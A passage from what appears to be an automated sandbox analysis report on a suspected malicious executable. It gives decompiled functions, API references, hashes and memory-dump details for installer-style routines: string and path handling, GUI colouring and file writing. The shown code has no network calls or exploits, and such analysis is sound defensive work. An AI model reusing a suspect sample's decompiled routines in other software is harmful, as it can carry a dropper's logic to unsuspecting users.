                                                                                                                    • Opcode Fuzzy Hash: 87f5dfd5f3f98710c2d4cb889120a35c512483e8d73b73e88293233abc1def33
                                                                                                                    • Instruction Fuzzy Hash: C741BF7160460AEFFB12DF60CDC496BBBEDFB082D4B120525FA458615DCB32AC58DB21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10002440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E10002440(void* __edx, intOrPtr _a4) {
				signed int _v4;
				CHAR* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t43;
				void** _t49;
				CHAR* _t58;
				void* _t59;
				signed int* _t60;
				void* _t61;
				intOrPtr* _t62;
				CHAR* _t63;
				void* _t73;

				_t59 = __edx;
				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t62 = (_v4 << 5) + _t9;
					_t32 =  *(_t62 + 0x14);
					if(_t32 == 0) {
						goto L9;
					}
					_t58 = 0x1a;
					if(_t32 == _t58) {
						goto L9;
					}
					if(_t32 != 0xffffffff) {
						if(_t32 <= 0 || _t32 > 0x19) {
							 *(_t62 + 0x14) = _t58;
						} else {
							_t32 = E100015E5(_t32 - 1);
							L10:
						}
						goto L11;
					} else {
						_t32 = E10001561();
						L11:
						_t63 = _t32;
						_t13 = _t62 + 8; // 0x820
						_t60 = _t13;
						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
							_t49 = _t60;
						} else {
							_t49 =  *_t60;
						}
						_t33 =  *_t62;
						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
						if(_t33 == 0) {
							 *_t60 =  *_t60 & 0x00000000;
						} else {
							if(_t33 == 1) {
								_t36 = E10001641(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E10001641(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001550(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
									 *(_t62 + 0x1c) = _t61;
									MultiByteToWideChar(0, 0, _t63,  *0x10004058, _t61,  *0x10004058);
									if( *_t62 != 5) {
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E1000274E(E10001641(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001550(0x10004034);
					goto L10;
				}
			}

















                                                                                                                    0x10002440
                                                                                                                    0x10002454
                                                                                                                    0x10002458
                                                                                                                    0x10002463
                                                                                                                    0x10002463
                                                                                                                    0x1000246a
                                                                                                                    0x1000246f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10002473
                                                                                                                    0x10002476
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1000247b
                                                                                                                    0x10002486
                                                                                                                    0x10002496
                                                                                                                    0x1000248d
                                                                                                                    0x1000248f
                                                                                                                    0x100024a5
                                                                                                                    0x100024a5
                                                                                                                    0x00000000
                                                                                                                    0x1000247d
                                                                                                                    0x1000247d
                                                                                                                    0x100024a6
                                                                                                                    0x100024aa
                                                                                                                    0x100024ac
                                                                                                                    0x100024ac
                                                                                                                    0x100024af
                                                                                                                    0x100024b5
                                                                                                                    0x100024b1
                                                                                                                    0x100024b1
                                                                                                                    0x100024b1
                                                                                                                    0x100024b7
                                                                                                                    0x100024b9
                                                                                                                    0x100024bf
                                                                                                                    0x1000258a
                                                                                                                    0x100024c5
                                                                                                                    0x100024c8
                                                                                                                    0x10002583
                                                                                                                    0x1000256f
                                                                                                                    0x10002570
                                                                                                                    0x1000258d
                                                                                                                    0x1000258e
                                                                                                                    0x10002599
                                                                                                                    0x100025c3
                                                                                                                    0x100025c3
                                                                                                                    0x100025a9
                                                                                                                    0x100025b5
                                                                                                                    0x100025ab
                                                                                                                    0x100025ab
                                                                                                                    0x100025ab
                                                                                                                    0x00000000
                                                                                                                    0x100025a9
                                                                                                                    0x100024d1
                                                                                                                    0x1000257b
                                                                                                                    0x1000257d
                                                                                                                    0x00000000
                                                                                                                    0x1000257d
                                                                                                                    0x100024d7
                                                                                                                    0x100024da
                                                                                                                    0x10002567
                                                                                                                    0x1000256c
                                                                                                                    0x00000000
                                                                                                                    0x1000256c
                                                                                                                    0x100024e0
                                                                                                                    0x100024e9
                                                                                                                    0x10002525
                                                                                                                    0x10002527
                                                                                                                    0x10002537
                                                                                                                    0x10002540
                                                                                                                    0x10002562
                                                                                                                    0x10002542
                                                                                                                    0x10002546
                                                                                                                    0x1000254d
                                                                                                                    0x10002551
                                                                                                                    0x10002553
                                                                                                                    0x1000255a
                                                                                                                    0x1000255a
                                                                                                                    0x100024eb
                                                                                                                    0x100024ee
                                                                                                                    0x10002510
                                                                                                                    0x10002512
                                                                                                                    0x100024ee
                                                                                                                    0x100024e9
                                                                                                                    0x100024e0
                                                                                                                    0x00000000
                                                                                                                    0x100024bf
                                                                                                                    0x1000249b
                                                                                                                    0x100024a0
                                                                                                                    0x00000000
                                                                                                                    0x100024a0

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 100024F5
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000251F
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 10002537
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002546
                                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 10002553
                                                                                                                    • GlobalFree.KERNEL32 ref: 1000255A
                                                                                                                    • GlobalFree.KERNEL32 ref: 1000258E
                                                                                                                      • Part of subcall function 10001550: lstrcpyA.KERNEL32(00000000,?,10001607,?,100011A1,-000000A0), ref: 1000155A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpylstrlen
                                                                                                                    • String ID: @u<u
                                                                                                                    • API String ID: 520554397-3153514966
                                                                                                                    • Opcode ID: 4d2a09eee45eedff946f98fdd0adfb8314ee589d0cc0d31195a6165608b31656
                                                                                                                    • Instruction ID: b3baf62e5a9b027ff8c076c09efcd2265374c504b674d9c0734edd534e3ded0a
                                                                                                                    • Opcode Fuzzy Hash: 4d2a09eee45eedff946f98fdd0adfb8314ee589d0cc0d31195a6165608b31656
                                                                                                                    • Instruction Fuzzy Hash: BC41BA71505A02DFF320CF248C94B6AB7F8FB443E2F614919F946DA199DB70E8808B66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                    0x00405dfc
                                                                                                                    0x00405e04
                                                                                                                    0x00405e18
                                                                                                                    0x00405e18
                                                                                                                    0x00405e1e
                                                                                                                    0x00405e2b
                                                                                                                    0x00405e2b
                                                                                                                    0x00405e2c
                                                                                                                    0x00405e2e
                                                                                                                    0x00405e32
                                                                                                                    0x00405e34
                                                                                                                    0x00405e3d
                                                                                                                    0x00405e3f
                                                                                                                    0x00405e59
                                                                                                                    0x00405e61
                                                                                                                    0x00405e61
                                                                                                                    0x00405e66
                                                                                                                    0x00405e68
                                                                                                                    0x00405e6a
                                                                                                                    0x00405e6e
                                                                                                                    0x00405e6f
                                                                                                                    0x00405e72
                                                                                                                    0x00405e7a
                                                                                                                    0x00405e7c
                                                                                                                    0x00405e80
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405e86
                                                                                                                    0x00405e8b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00405e8b
                                                                                                                    0x00405e90

                                                                                                                    APIs
                                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                    • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 589700163-2419550643
                                                                                                                    • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                    • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                                                                                    • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                    • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                    0x00403ecd
                                                                                                                    0x00403f61
                                                                                                                    0x00000000
                                                                                                                    0x00403f61
                                                                                                                    0x00403ede
                                                                                                                    0x00403ee2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403ee8
                                                                                                                    0x00403ef1
                                                                                                                    0x00403ef4
                                                                                                                    0x00403ef4
                                                                                                                    0x00403efa
                                                                                                                    0x00403f00
                                                                                                                    0x00403f00
                                                                                                                    0x00403f0c
                                                                                                                    0x00403f12
                                                                                                                    0x00403f19
                                                                                                                    0x00403f1c
                                                                                                                    0x00403f1f
                                                                                                                    0x00403f21
                                                                                                                    0x00403f21
                                                                                                                    0x00403f29
                                                                                                                    0x00403f2f
                                                                                                                    0x00403f2f
                                                                                                                    0x00403f39
                                                                                                                    0x00403f3e
                                                                                                                    0x00403f41
                                                                                                                    0x00403f46
                                                                                                                    0x00403f49
                                                                                                                    0x00403f49
                                                                                                                    0x00403f59
                                                                                                                    0x00403f59
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2320649405-0
                                                                                                                    • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                    • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                                                                                    • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                    • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                    0x004026af
                                                                                                                    0x004026b1
                                                                                                                    0x004026bd
                                                                                                                    0x004026c0
                                                                                                                    0x004026ca
                                                                                                                    0x004026ce
                                                                                                                    0x004026ce
                                                                                                                    0x004026d4
                                                                                                                    0x004026e1
                                                                                                                    0x004026e9
                                                                                                                    0x004026ec
                                                                                                                    0x004026f2
                                                                                                                    0x00402700
                                                                                                                    0x00402705
                                                                                                                    0x00402709
                                                                                                                    0x0040270c
                                                                                                                    0x00402715
                                                                                                                    0x00402721
                                                                                                                    0x00402725
                                                                                                                    0x00402728
                                                                                                                    0x00402732
                                                                                                                    0x00402751
                                                                                                                    0x00402739
                                                                                                                    0x0040273e
                                                                                                                    0x00402746
                                                                                                                    0x00402749
                                                                                                                    0x0040274e
                                                                                                                    0x0040274e
                                                                                                                    0x00402758
                                                                                                                    0x00402758
                                                                                                                    0x0040276a
                                                                                                                    0x00402771
                                                                                                                    0x00402783
                                                                                                                    0x00402783
                                                                                                                    0x00402789
                                                                                                                    0x00402789
                                                                                                                    0x00402794
                                                                                                                    0x00402795
                                                                                                                    0x00402799
                                                                                                                    0x0040279d
                                                                                                                    0x004027a3
                                                                                                                    0x004027a3
                                                                                                                    0x004027aa
                                                                                                                    0x00402197
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                    • GlobalFree.KERNEL32 ref: 00402758
                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                    • GlobalFree.KERNEL32 ref: 00402771
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3294113728-0
                                                                                                                    • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                    • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                                                                                    • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                    • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                    0x00404e8a
                                                                                                                    0x00404e96
                                                                                                                    0x00404e99
                                                                                                                    0x00404e9f
                                                                                                                    0x00404eab
                                                                                                                    0x00404eae
                                                                                                                    0x00404eb1
                                                                                                                    0x00404eb7
                                                                                                                    0x00404eb7
                                                                                                                    0x00404ebd
                                                                                                                    0x00404ec5
                                                                                                                    0x00404ec8
                                                                                                                    0x00404ee5
                                                                                                                    0x00404ee9
                                                                                                                    0x00404ef2
                                                                                                                    0x00404ef2
                                                                                                                    0x00404efc
                                                                                                                    0x00404f05
                                                                                                                    0x00404f11
                                                                                                                    0x00404f18
                                                                                                                    0x00404f1c
                                                                                                                    0x00404f1f
                                                                                                                    0x00404f32
                                                                                                                    0x00404f40
                                                                                                                    0x00404f40
                                                                                                                    0x00404f44
                                                                                                                    0x00404f46
                                                                                                                    0x00404f49
                                                                                                                    0x00000000
                                                                                                                    0x00404f49
                                                                                                                    0x00404eca
                                                                                                                    0x00404ed2
                                                                                                                    0x00404eda
                                                                                                                    0x00404ee0
                                                                                                                    0x00000000
                                                                                                                    0x00404ee0
                                                                                                                    0x00404eda
                                                                                                                    0x00404ec8
                                                                                                                    0x00404f53

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                    • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                    • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                    • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                    • SendMessageA.USER32 ref: 00404F18
                                                                                                                    • SendMessageA.USER32 ref: 00404F32
                                                                                                                    • SendMessageA.USER32 ref: 00404F40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2531174081-0
                                                                                                                    • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                    • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                                                                                    • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                    • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                    0x00404761
                                                                                                                    0x0040476e
                                                                                                                    0x00404774
                                                                                                                    0x004047b2
                                                                                                                    0x004047b2
                                                                                                                    0x004047c1
                                                                                                                    0x004047c8
                                                                                                                    0x00000000
                                                                                                                    0x004047ca
                                                                                                                    0x00404776
                                                                                                                    0x00404785
                                                                                                                    0x0040478d
                                                                                                                    0x00404790
                                                                                                                    0x004047a2
                                                                                                                    0x004047a8
                                                                                                                    0x004047af
                                                                                                                    0x00000000
                                                                                                                    0x004047af
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                    • String ID: f
